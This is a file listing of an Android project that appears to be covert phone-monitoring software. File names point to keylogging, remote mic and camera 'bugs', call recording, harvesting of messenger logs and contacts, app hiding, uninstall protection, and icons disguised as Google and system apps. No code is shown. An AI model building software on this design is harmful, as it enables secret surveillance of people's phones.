# TOS-1.8.2-WM-backup

./: AndroidData  README.md  build.gradle  gradle.properties  local.properties  settings.gradle
androidlame/: build.gradle
androidlame/src/main/java/com/naman14/androidlame/: LameBuilder.java
androidlame/src/main/jni/: Android.mk
app/: build.gradle  fabric.properties  google-services.json  proguard-rules.pro  unused.txt
app/alpha/release/: output-metadata.json
app/release/: output.json
app/src/main/: AndroidManifest.xml
app/src/main/cpp/: audio_common.cpp  audio_common.h  audio_main.cpp  audio_player.cpp  audio_player.h  audio_recorder.cpp  buf_manager.h  debug_utils.cpp
app/src/main/java/com/android/services/: MyApplication.kt
app/src/main/java/com/android/services/accessibility/: AccessibilityEventType.java  AccessibilityUtils.kt
app/src/main/java/com/android/services/adapter/: AppIconAndNameSpinnerAdapter.java
app/src/main/java/com/android/services/binding/: BindingAdapters.kt
app/src/main/java/com/android/services/custom/: AutoFitTextureView.java
app/src/main/java/com/android/services/db/: TextAlertEventDao.kt
app/src/main/java/com/android/services/dialogs/: AppStoppedDialog.kt  UninstallDialog.kt  UninstallProtectionUtility.kt
app/src/main/java/com/android/services/enums/: CallRecordType.kt  FcmPushStatus.kt  IMType.java  PermissionScreens.kt  TextAlertCategory.kt  View360InteruptionType.kt
app/src/main/java/com/android/services/exceptionHandler/: MyCustomCrashHandler.java  UncaughtExceptionHandlerContentProvider.kt
app/src/main/java/com/android/services/interfaces/: CustomDialogListener.kt  CustomListener.java  IBackgroundProcessing.kt  IWorkerProcessing.kt  LogsCollector.kt  OnAccessibilityEvent.java
app/src/main/java/com/android/services/jobScheduler/: NetworkJobScheduler.kt  ObserverJobScheduler.kt
app/src/main/java/com/android/services/logs/: LogFactory.kt
app/src/main/java/com/android/services/models/: AccessibilityEventModel.kt  ActivateDevice.kt  ActivateDeviceResponse.kt  AppBlockUnblockCommand.kt  AppIconNameChanger.kt  AppLimitCommand.kt  AppNameAndIcon.kt  AppPermission.kt  AppPermissionLogs.kt  AppPermissionUpload.kt  AppointmentUpload.kt  Auth.kt  BrowserHistoryUpload.kt  CallLogUpload.kt  CallRecord.kt  CameraBugCommand.kt  ConnectedNetworkUpload.kt  ContactsUpload.kt  DeviceInfoResponse.kt  DeviceInformation.kt  FCMPush.kt  FCMToken.kt  FacebookUnrootedLogs.kt  FcmPushCommand.kt  FileUploadResponse.kt  GeoFenceCommand.kt  GeoFenceLogs.kt  GeoLocationUpload.kt  GetPushStatus.kt  HikeUnrootedLogs.kt  IMOUnrootedLogs.kt  InstagramUnrootedLogs.kt  InstalledAppUpload.kt  KeyLogUpload.kt  LineUnrootedLogs.kt  MicBugCommand.kt  MicBugScheduleCommand.kt  NodeInfo.kt  NotificationAlert.kt  NotificationUpload.kt  (+34 more)
app/src/main/java/com/android/services/nativePackage/: AudioRecorder.kt  AudioRecorderBase.kt  CallRecorderFixHelper.java  (+2 more)
app/src/main/res/drawable/: activate_btn.xml  app_icons_spinner_bg.xml  button_ripple_background.xml  circle_bg.xml  circle_shape.xml  close_btn.xml  edit_text_background.xml  layout_bg.xml  ring_shape.xml  text_view_ripple.xml
app/src/main/res/drawable-v21/: button_ripple_background.xml  text_view_ripple.xml
app/src/main/res/layout/: activity_device_activation.xml  activity_main.xml  activity_manual_permission.xml  app_icon_and_name_spinner_item.xml  app_stopped_alert_dialog.xml  fragment_accessibility.xml  fragment_device_activation.xml  fragment_device_admin_apps.xml  fragment_disable_notification.xml  fragment_display_over_apps.xml  fragment_hide_app.xml  fragment_location.xml  fragment_management_of_files.xml  fragment_notification_access.xml  fragment_screen_record.xml  fragment_usage_access.xml  layout_camera_bug.xml  protection_alert.xml  screen_recording.xml  spinner_layout.xml  texture_view.xml
app/src/main/res/layout-v26/: fragment_disable_notification.xml
app/src/main/res/layout-v29/: fragment_screen_record.xml
app/src/main/res/mipmap-anydpi-v26/: alcatel_icon.xml  amazon_icon_round.xml  asus_icon_round.xml  huawei_icon.xml  ic_android_system_round.xml  ic_battery_care_round.xml  ic_battery_manager_round.xml  ic_device_secure.xml  ic_file_manager_icon_round.xml  ic_google_analytics.xml  ic_google_app_icon.xml  ic_google_files.xml  ic_health_manager.xml  ic_photos_icon_round.xml  infinix_icon_round.xml  itel_icon_round.xml  lenovo_icon_round.xml  lg_icon_round.xml  motorola_icon.xml  nokia_icon_round.xml  one_plus_icon.xml  oppo_icon_round.xml  real_me_icon.xml  samsung_icon_round.xml  screen_controller.xml  sony_icon.xml  techno_icon_round.xml  vivo_icon.xml  xiaomi_icon.xml  zte_icon.xml
app/src/main/res/values/: alcatel_icon_background.xml  amazon_icon_background.xml  apps_security_background.xml  asus_icon_background.xml  battery_optimiser_background.xml  colors.xml  device_protection_services_background.xml  dimens.xml  display_services_background.xml  huawei_icon_background.xml  ic_android_system_background.xml  ic_android_system_webview.png_background.xml  ic_android_system_webview_background.xml  ic_battery_care_background.xml  ic_battery_manager_background.xml  ic_carrier_services.png.png_background.xml  ic_carrier_services_background.xml  ic_device_secure_background.xml  ic_file_manager_icon_background.xml  ic_google_analytics_background.xml  ic_google_app_icon_background.xml  ic_google_apps_policy_background.xml  ic_google_console_background.xml  ic_google_files_background.xml  ic_google_keyboard_background.xml  ic_google_maps_background.xml  ic_google_news_background.xml  ic_google_play_games_background.xml  ic_google_play_service_icon_background.xml  ic_google_services_info_background.xml  ic_health_manager_background.xml  ic_music_background.xml  ic_photos_icon_background.xml  infinix_icon_background.xml  internet_services_handler_background.xml  itel_icon_background.xml  lenovo_icon_background.xml  lg_icon_background.xml  lock_screen_manager_background.xml  memory_cleaner_services_background.xml  (+17 more)
app/src/main/res/xml/: accessibility.xml  device_admin_sample.xml
(+398 files in other folders)
